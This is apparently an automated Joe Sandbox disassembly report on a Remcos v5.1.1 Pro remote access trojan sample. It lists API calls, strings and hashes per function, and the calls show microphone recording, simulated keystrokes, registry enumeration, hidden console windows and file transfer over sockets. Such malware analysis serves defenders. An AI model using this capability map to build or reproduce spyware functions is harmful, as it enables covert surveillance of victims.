                                                                                                                                                                      • API String ID: 3809562944-243156785
                                                                                                                                                                      • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                                                      • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                                                      • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                                                      • int.LIBCPMT ref: 00410EBC
                                                                                                                                                                        • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                        • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                      • String ID: ,kG$0kG
                                                                                                                                                                      • API String ID: 3815856325-2015055088
                                                                                                                                                                      • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                                                      • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                                                                                                      • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                                                      • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                                                      • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                                                                                                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                                                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                                                      • waveInStart.WINMM ref: 00401CFE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                      • String ID: dMG$|MG$PG
                                                                                                                                                                      • API String ID: 1356121797-532278878
                                                                                                                                                                      • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                                                      • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                                                                                                      • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                                                        • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                                                                        • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                                                                        • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                                                      • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                                                                      • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                                                      • GetMessageA.USER32 ref: 0041D591
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                      • String ID: Remcos
                                                                                                                                                                      • API String ID: 1970332568-165870891
                                                                                                                                                                      • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                                      • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                                                                      • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                                      • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                      • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                                                      • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                      • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                                                                                      • __freea.LIBCMT ref: 00454083
                                                                                                                                                                      • __freea.LIBCMT ref: 0045408F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 201697637-0
                                                                                                                                                                      • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                                                                                      • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                                                      • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                                                                                      • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                                                      • _free.LIBCMT ref: 00445515
                                                                                                                                                                      • _free.LIBCMT ref: 0044552E
                                                                                                                                                                      • _free.LIBCMT ref: 00445560
                                                                                                                                                                      • _free.LIBCMT ref: 00445569
                                                                                                                                                                      • _free.LIBCMT ref: 00445575
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                      • String ID: C
                                                                                                                                                                      • API String ID: 1679612858-1037565863
                                                                                                                                                                      • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                                                                      • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                                                      • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                                                                      • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: tcp$udp
                                                                                                                                                                      • API String ID: 0-3725065008
                                                                                                                                                                      • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                      • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                                                      • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                      • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                                                      APIs
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                                                                        • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                      • String ID: PkG$XMG$NG$NG
                                                                                                                                                                      • API String ID: 1649129571-3151166067
                                                                                                                                                                      • Opcode ID: f94a77811fe8e3623d33bea81003120ea6c9a5dcda35734242ae3f99e24ad83a
                                                                                                                                                                      • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                                                      • Opcode Fuzzy Hash: f94a77811fe8e3623d33bea81003120ea6c9a5dcda35734242ae3f99e24ad83a
                                                                                                                                                                      • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                                                                                                      • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                                                        • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                                                                        • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                      • String ID: .part
                                                                                                                                                                      • API String ID: 1303771098-3499674018
                                                                                                                                                                      • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                                                      • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                                                      • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                                                      APIs
                                                                                                                                                                      • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                      • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                      • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                                                                                                                      • API String ID: 4067487056-3820604032
                                                                                                                                                                      • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                                                      • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                                                                                      • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                                                      • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendInput.USER32 ref: 00419A25
                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                                                      • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                                                        • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InputSend$Virtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1167301434-0
                                                                                                                                                                      • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                                      • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                                                      • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                                      • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                                      • String ID: a/p$am/pm$h{D
                                                                                                                                                                      • API String ID: 2936374016-2303565833
                                                                                                                                                                      • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                                                                      • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                                                      • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                      • _free.LIBCMT ref: 00444E87
                                                                                                                                                                      • _free.LIBCMT ref: 00444E9E
                                                                                                                                                                      • _free.LIBCMT ref: 00444EBD
                                                                                                                                                                      • _free.LIBCMT ref: 00444ED8
                                                                                                                                                                      • _free.LIBCMT ref: 00444EEF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$AllocateHeap
                                                                                                                                                                      • String ID: KED
                                                                                                                                                                      • API String ID: 3033488037-2133951994
                                                                                                                                                                      • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                                                                      • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                                                      • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                                                                      • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Enum$InfoQueryValue
                                                                                                                                                                      • String ID: [regsplt]$xUG$TG
                                                                                                                                                                      • API String ID: 3554306468-1165877943
                                                                                                                                                                      • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                                                      • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                                                      • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                      • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                      • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                      • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                      • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                      • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                      • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                                                                                                      • __fassign.LIBCMT ref: 0044B4F9
